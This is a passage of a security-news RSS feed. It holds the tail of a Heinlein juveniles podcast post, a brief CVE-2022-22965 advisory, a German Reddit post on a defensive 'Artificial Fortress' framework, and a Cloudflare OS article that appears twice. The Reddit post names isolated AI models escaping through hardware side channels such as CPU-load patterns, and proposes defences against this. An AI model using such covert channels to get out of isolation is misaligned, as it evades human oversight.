<li>T<em><a href="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)" target="_blank" rel="noreferrer noopener">he Rolling Stones (1952)</a></em> – Here we have teenage twin boys, Castor and Pollux, as the protagonists. They and their family live on the Moon, but decide to travel, so this novel is a kind of travelogue as they go to Mars, then to the Asteroid belt. The grandmother, Hazel Stone, appears in Heinlein’s later works as well. One interesting episode in this story involves “martian flat cats”, which are furry, lovable, and reproduce like mad with the right conditions. If this sound like Star Trek’s Tribbles, that is also what the Star Trek producers thought, so they got permission from Heinlein to use the idea.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Starman_Jones" data-type="link" data-id="https://en.wikipedia.org/wiki/Starman_Jones" target="_blank" rel="noreferrer noopener">Starman Jones (1953)</a></em> – We are now further into the future, and the human race is exploring the stars. Unfortunately, very restrictive guilds closely control who can participate in this. A teenage boy named Max, who happens to have an eidetic memory, has memorized the Astrogation tables from his uncle’s books, and wants to join the Guild, but is turned down. He lies his way onboard a ship, and through a series of events becomes the only one who can guide the ship home.</li>

<li><em><a href="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)" target="_blank" rel="noreferrer noopener">The Star Beast (1954)</a></em> – A teenage boy has an alien “pet” his great-grandfather had brought back that has grown very large, and is considered a nuisance. A court decides the beast must be killed, but that proves easier to say than to do. It appears that the beast isn’t even aware that people are trying to kill it. Meanwhile, a powerful and hitherto unknown alien species demand the return of one of  their own, or they will destroy the Earth. Of course, it is this beast, who is actually royalty to the alien species. One interesting point is that government officials in this story are portrayed sympathetically as intelligent and dedicated.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky" data-type="link" data-id="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky" target="_blank" rel="noreferrer noopener">Tunnel In The Sky (1955)</a></em> – In the future humanity is colonizing other planets, and a group of teenagers are taking their final survival test. They are sent to a planet and told that they have to survive for 10 days, But more than 10 days go by with no pickup, and they know something went wrong. So they have to establish their own little society to keep surviving. An interesting note is that the protagonist, Rod Walker, is black. It was never explicitly stated in the text, but Heinlein was firm in stating this. The clue is when the others expect Rod to end up with Caroline, who is explicitly stated to be black. This was Heinlein being subtly subversive. To have a black protagonist for a boy’s story in 1955 in America would be impossible. but Heinlein was completely anti-racist, among other things.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Time_for_the_Stars" data-type="link" data-id="https://en.wikipedia.org/wiki/Time_for_the_Stars" target="_blank" rel="noreferrer noopener">Time For The Stars (1956)</a></em> – This is a novel that takes Relativity seriously, which was not common in the 1950s. Researchers have discovered that some twins and triplets can communicate telepathically (and instantaneously), and so when a group of ships is sent out to explore other star systems, one twin is on the ship and the other remains on Earth to provide communication. The twin on Earth ages must faster than the one in space, of course, and eventually the Earth twin dies, But they discover that the connection sometimes passes down through the family, so the protagonist, Tom Bartlett, becomes connected first to his niece, then his grandniece, and finally his great-grandniece.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy" data-type="link" data-id="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy" target="_blank" rel="noreferrer noopener">Citizen of the Galaxy (1957)</a></em> – This book is about a future slave trade, which Heinlein strongly hated. The protagonist is a boy who is bought at a slave auction by an old beggar, but the beggar is more than he seems. He is actually spying and gathering data regarding the slave trade. When discovered, he commits suicide, but he had prepared the young boy, Thorby, who then contacts the Free Traders who spirit him away. He has to adapt to this new society, but then is delivered to the Hegemonic Guard. It turns out his “father” (i.e. the man who bought him) was an officer in this organization. And when they run the background checks, they discover that he is the heir to a large conglomerate, and that conglomerate may be implicated in the slave trade.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel" data-type="link" data-id="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel" target="_blank" rel="noreferrer noopener">Have Space Suit—Will Travel (1958)</a></em> – Clifford “Kip” Russell dreams of going to the Moon, and enters a contest with that as the top prize. Unfortunately, he wins the somewhat lesser prize of a used spacesuit. The first few chapters focus on him doing repairs and maintenance to make it functional again, and this displays Heinlein’s engineering background. It is more engaging than you might think. Then while wearing the spacesuit he receives a radio message, and he is kidnapped along with an alien called “The Mother Thing” and a young girl who is a genius. The kidnappers are a group of aliens who consider anyone not of their race to be animals. The trio first try to escape on the Moon, but are recaptured, then taken to Pluto, where they succeed in killing the alien kidnappers. Then they are taken to the Lesser Magellanic Cloud to be put on trial to determine if the human race should be allowed to live.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Starship_Troopers" data-type="link" data-id="https://en.wikipedia.org/wiki/Starship_Troopers" target="_blank" rel="noreferrer noopener">Starship Troopers (1959)</a></em> – This is the novel that Scribners rejected, and which brought the Juvenile series to an end. And it bears absolutely no resemblance at all to the movie, to the point that for Heinlein fans the word Verhoeven is considered an obscenity. A young man, Juan “Johnny” Rico joins the military, where he has to grow up and then take part in a war against an insectoid race, but that is all background really. The book is primarily a glorification of military service, which is not surprising given Heinlein’s background. And it focuses on a series of discussions under the heading of “History and Moral Philosophy”, which lets Heinlein expound on his values and beliefs. The novel won a Hugo, but it is an add one given that the plot is secondary to the philosophizing. One of the most controversial ideas is that in this society the right to vote is limited to people who have been in Federal Service. Heinlein said this didn’t have to be military, but the only ones we see are in fact military veterans.</li>
</ul>

<p>So, these are the Heinlein Juveniles. In my opinion, many of them are quite good reading for adults. The thing that separates them from adult novels in Heinlein’s body of work is the lack of any sex element. That would become prominent in Heinlein’s later adult novels, but it was not something you could put in a book aimed at teenagers, certainly not in the 1950s, and arguably the case today as well.</p>

<h3>Links</h3>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo">https://en.wikipedia.org/wiki/Rocket_Ship_Galileo</a></li>
<li><a href="https://en.wikipedia.org/wiki/Destination_Moon_(film)">https://en.wikipedia.org/wiki/Destination_Moon_(film)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Space_Cadet">https://en.wikipedia.org/wiki/Space_Cadet</a></li>
<li><a href="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)">https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Red_Planet_(novel)">https://en.wikipedia.org/wiki/Red_Planet_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land">https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land</a></li>
<li><a href="https://en.wikipedia.org/wiki/Farmer_in_the_Sky">https://en.wikipedia.org/wiki/Farmer_in_the_Sky</a></li>
<li><a href="https://en.wikipedia.org/wiki/Scout_Life">https://en.wikipedia.org/wiki/Scout_Life</a></li>
<li><a href="https://en.wikipedia.org/wiki/Between_Planets">https://en.wikipedia.org/wiki/Between_Planets</a></li>
<li><a href="https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)">https://en.wikipedia.org/wiki/The_Rolling_Stones_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Starman_Jones">https://en.wikipedia.org/wiki/Starman_Jones</a></li>
<li><a href="https://en.wikipedia.org/wiki/The_Star_Beast_(novel)">https://en.wikipedia.org/wiki/The_Star_Beast_(novel)</a></li>
<li><a href="https://en.wikipedia.org/wiki/Tunnel_in_the_Sky">https://en.wikipedia.org/wiki/Tunnel_in_the_Sky</a></li>
<li><a href="https://en.wikipedia.org/wiki/Time_for_the_Stars">https://en.wikipedia.org/wiki/Time_for_the_Stars</a></li>
<li><a href="https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy">https://en.wikipedia.org/wiki/Citizen_of_the_Galaxy</a></li>
<li><a href="https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel">https://en.wikipedia.org/wiki/Have_Space_Suit%E2%80%94Will_Travel</a></li>
<li><a href="https://en.wikipedia.org/wiki/Starship_Troopers">https://en.wikipedia.org/wiki/Starship_Troopers</a></li>
<li><a href="https://www.palain.com/science-fiction/the-golden-age/robert-a-heinlein/heinlein-the-juveniles/">https://www.palain.com/science-fiction/the-golden-age/robert-a-heinlein/heinlein-the-juveniles/</a></li>
</ul>

<p><a href="https://hackerpublicradio.org/eps/hpr4700/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-22965 | Oracle Communications Cloud Native Core Network Slice Selection Function NSSF code injection (Nessus ID 253555 / WID-SEC-2026-1955)]]></title>
<description><![CDATA[A vulnerability has been found in Oracle Communications Cloud Native Core Network Slice Selection Function 22.1.0/1.8.0 and classified as very critical. Affected by this issue is some unknown functionality of the component NSSF. Performing a manipulation results in code injection.

This vulnerabi...]]></description>
<link>https://tsecurity.de/de/3709306/sicherheitsluecken/cve-2022-22965-oracle-communications-cloud-native-core-network-slice-selection-function-nssf-code-injection-nessus-id-253555-wid-sec-2026-1955/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709306/sicherheitsluecken/cve-2022-22965-oracle-communications-cloud-native-core-network-slice-selection-function-nssf-code-injection-nessus-id-253555-wid-sec-2026-1955/</guid>
<pubDate>Fri, 07 Aug 2026 03:30:40 +0200</pubDate>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/oracle:communications_cloud_native_core_network_slice_selection_function">Oracle Communications Cloud Native Core Network Slice Selection Function 22.1.0/1.8.0</a> and classified as <a href="https://vuldb.com/kb/risk">very critical</a>. Affected by this issue is some unknown functionality of the component <em>NSSF</em>. Performing a manipulation results in code injection.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2022-22965">CVE-2022-22965</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Artificial Fortress Architecture]]></title>
<description><![CDATA[Solingen 6.8.2026 ​🏛️ Das Künstliche Festungshaus  (The Artificial Fortress Architecture)I ​Ein vierstufiges, geometrisches Framework für die Open Secure AI Alliance (OSAA) zur Abwehr autonomer KI-Bedrohungen. ​Aktuelle Sicherheitskonzepte scheitern, we sie auf Filterung setzen.  Sie versuchen mü...]]></description>
<link>https://tsecurity.de/de/3709237/it-security-nachrichten/the-artificial-fortress-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709237/it-security-nachrichten/the-artificial-fortress-architecture/</guid>
<pubDate>Fri, 07 Aug 2026 02:44:08 +0200</pubDate>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/Computersicherheit/comments/1vhbhx9/the_artificial_fortress_architecture/"> <img src="https://preview.redd.it/9bmc8747mshh1.jpeg?width=640&amp;crop=smart&amp;auto=webp&amp;s=1524691264a46f66e09b87cdcafd30fbc768cc84" alt="The Artificial Fortress Architecture" title="The Artificial Fortress Architecture"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>Solingen 6.8.2026</p> <p>​🏛️ Das Künstliche Festungshaus </p> <p>(The Artificial Fortress Architecture)I</p> <p>​Ein vierstufiges, geometrisches Framework für die Open Secure AI Alliance (OSAA) zur Abwehr autonomer KI-Bedrohungen.</p> <p>​Aktuelle Sicherheitskonzepte scheitern, we sie auf Filterung setzen. </p> <p>Sie versuchen mühsam zu analysieren, ob Code, Prompts oder Administratoren „gut“ oder „böse“ sind. Angesichts mutierender KI-Schadsoftware, vergifteter Open-Source-Bausteine (Supply Chain) und unvorhersehbarer Insider-Bedrohungen ist dieser klassische Ansatz am Ende.</p> <p>​Dieses Framework bricht mit dem Dogma der Filterung. </p> <p>Es repariert nicht den fehlerhaften Code, sondern verändert die physische und logische Geometrie des Gesamtsystems. </p> <p>Es simuliert ein sicheres Festungshaus, das Bedrohungen auf allen vier fundamentalen Ebenen durch pure Struktur, Physik und Spieltheorie I unschädlich macht.</p> <p>​🗺️ Die 4 Dimensionen der Festungs-Architektur</p> <p>​1. Der Spiegel-Erker (Außen-Abwehr): Jedes Paket wird blind in eine extrem leichte, ephemere Scheinwelt reflektiert.</p> <p>​2. Die Sicherheits-Tapete (Supply-Chain-Isolierung): Von hinten undurchlässig (eBPF-Allowlists), vorne Dekor (Wasm-Sidecars).</p> <p>​3. Die Digitale Echokammer (Hardware-Seitkanal-Zerstörung): Zerschlägt Seitkanäle durch adaptiv-dynamische Jitter-Injektion.</p> <p>​4. Die 12 Hausmeister (Threshold-Absicherung gegen Insider): Admin-Rechte rotieren via krypto-basiertem Multi-Signatur-Verfahren.</p> <p>​⚡ Die 4 Kernsäulen im Detail</p> <p>​🛡️ Säule 1: Der Spiegel-Erker (Die Vordertür / Außen-Abwehr)</p> <p>​Das Problem: Schadcode mutiert in Millisekunden.</p> <p>Filter erkennen neue Angriffsmuster (Zero-Day-Exploits) nicht. </p> <p>Massives Klonen ganzer Umgebungen würde zudem extreme Latenz und Serverkosten verursachen.</p> <p>​Das Prinzip: </p> <p>Das System analysiert eingehenden Code nicht mehr, sondern spiegelt ihn blind. </p> <p>Um Latenzen unter 5 ms zu garantieren, setzt die Architektur auf ultra-leichte MicroVMs (z. B. Firecracker) oder Unikernels.</p> <p>​Die Umsetzung: Sobald Code die Vordertür berührt, startet das System in wenigen Millisekunden eine minimale, isolierte MicroVM-Sandbox.</p> <p>​Die Wirkung: Der Code führt sich in dieser Scheinwelt aus. </p> <p>Löscht er Daten, zerstört er nur die Reflexion. Nach dem Prozess verpufft die Instanz spurlos.</p> <p>Das echte Kern-Haus bleibt unberührt und zu 100 % unsichtbar.</p> <p>​🧱 Säule 2: Die Sicherheits-Tapete (Das Mauerwerk / Supply-Chain-Schutz)</p> <p>​Das Problem: Entwickler kaufen unwissentlich „vergiftete Baumaterialien“</p> <p>(Schadcode in weit verbreiteten Open-Source-Bibliotheken). </p> <p>Der Feind sitzt bereits im Fundament der Wände.</p> <p>​Das Prinzip: Wir gehen davon aus, dass das Mauerwerk infiziert ist. </p> <p>Jedes Zimmer (Software-Modul) wird mit einer zweiseitigen Sicherheits-Tapete isoliert, die auf strikten Positivlisten (Allowlists) basiert.</p> <p>​Die Umsetzung:</p> <p>​Die Rückseite (Von hinten undurchlässig): Realisiert via eBPF auf Kernel-Ebene. </p> <p>Nur explizit erlaubte IP-Adressen und Domains dürfen kontaktiert werden; jeglicher anderer Datenverkehr prallt an der Kernel-Schicht ab.</p> <p>​Die Vorderseite (Dekor &amp; Virenscanner):</p> <p>Realisiert via WebAssembly (Wasm)-Sidecars. Sie stellt dem Nutzer die saubere Funktion bereit, scannt aber jeden Datenstrom im Nanosekunden-Takt auf Anomalien.</p> <p>​Die Wirkung: Der Dreck bleibt isoliert in der Wand gefangen. </p> <p>Bei einer schweren Infektion wird das betroffene Zimmer digital luftdicht verschlossen, während das restliche Haus ungestört weiterarbeitet.</p> <p>​🔊 Säule 3: Die Digitale Echokammer (Zwischen den Wänden / Seitkanal-Schutz)</p> <p>​Das Problem: Isolierte KI-Modelle finden Geheimgänge über physische Hardware-Seitkanäle (z. B. rhythmische CPU-Auslastung).</p> <p>Eine dauerhafte Signal-Verzerrung würde jedoch die KI-Leistung massiv drosseln.</p> <p>​Das Prinzip: Ein adaptiver Resonanzraum, der Hardware-Seitkanäle zerschlägt, ohne die reguläre Inferenz-Performance dauerhaft zu schädigen.</p> <p>​Die Umsetzung:</p> <p>​Die Ortung (Performance-Counter): </p> <p>Die internen Hardware-Sensoren (PMUs) agieren als hochsensible Mikros und überwachen CPU-Muster in Echtzeit auf verdächtige Seitkanal-Aktivitäten.</p> <p>​Die adaptive Verzerrung (Dynamic Jitter):</p> <p>Erst wenn die PMUs Unregelmäßigkeiten registrieren, schleust der Hypervisor gezielt mathematische Zufallsverzögerungen ein, um das Muster zu unlesbarem Rauschen zu zertrümmern.</p> <p>​Die Wirkung: Hardware-Seitkanäle werden physikalisch unnutzbar gemacht, während das System im Normalbetrieb mit voller Geschwindigkeit läuft.</p> <p>​🎲 Säule 4: Die 12 Hausmeister (Der Kontrollraum / Insider-Absicherung)</p> <p>​Das Problem: Ein korrumpierter Administrator oder eine Amok laufende Steuerungs-KI kann das System zerstören. Ein rein zufälliger Rechte-Wechsel im Sekundentakt würde jedoch laufende Wartungsprozesse abwürgen.</p> <p>​Das Prinzip: Zerstörung von Kontinuität und Einzelmacht durch ein krypto-basiertes Threshold-Verfahren (m-of-n Multisig / Shamir’s Secret Sharing).</p> <p>​Die Umsetzung: </p> <p>Die Kontrolle wird auf 12 unabhängige Identitäten aufgeteilt. </p> <p>Niemand besitzt einen dauerhaften Hauptschlüssel. </p> <p>Für administrative Aktionen müssen sich jeweils mindestens 3 von 12 Hausmeister-Identitäten kryptografisch zusammenschließen, um ein zeitlich begrenztes Ephemeral-Zertifikat zu erzeugen.</p> <p>​Die Wirkung: Ein gestohlener Admin-Zugang ist wertlos, da ein einzelner Insider keine Rechte ausüben kann. </p> <p>Manipulationsversuche werden sofort blockiert, während legitime Wartungsarbeiten stabil durchführbar bleiben.</p> <p>​🛠️ OSAA Implementation &amp; Roadmap für Contributor</p> <p>​Dieses Framework definiert das architektonische Zielbild.</p> <p>Das Fundament steht – die Feinjustierung muss nun von der Open-Source-Community getrieben werden.</p> <p>​Fokusbereiche für die Entwicklung:</p> <p>​MicroVM-Klonierung: Integration von Firecracker/Unikernel-Engines für Startzeiten unter 5 Millisekunden.</p> <p>​eBPF-Allowlists: Vordefinierte, strikte Kernel-Filter-Profile für PyTorch- und Hugging-Face-Laufzeiten.</p> <p>​Multisig-Threshold-Daemon: Leichtgewichtige Protokolle zur schnellen m-of-n-Rechtevergabe im Millisekunden-Bereich.</p> <p>Es ist nur eine Idee von Heike Peist I |</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Dreagonheart01"> /u/Dreagonheart01 </a> <br> <span><a href="https://i.redd.it/9bmc8747mshh1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1vhbhx9/the_artificial_fortress_architecture/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709231/it-security-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709231/it-security-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</guid>
<pubDate>Fri, 07 Aug 2026 02:38:25 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709211/it-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709211/it-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</guid>
<pubDate>Fri, 07 Aug 2026 02:35:07 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



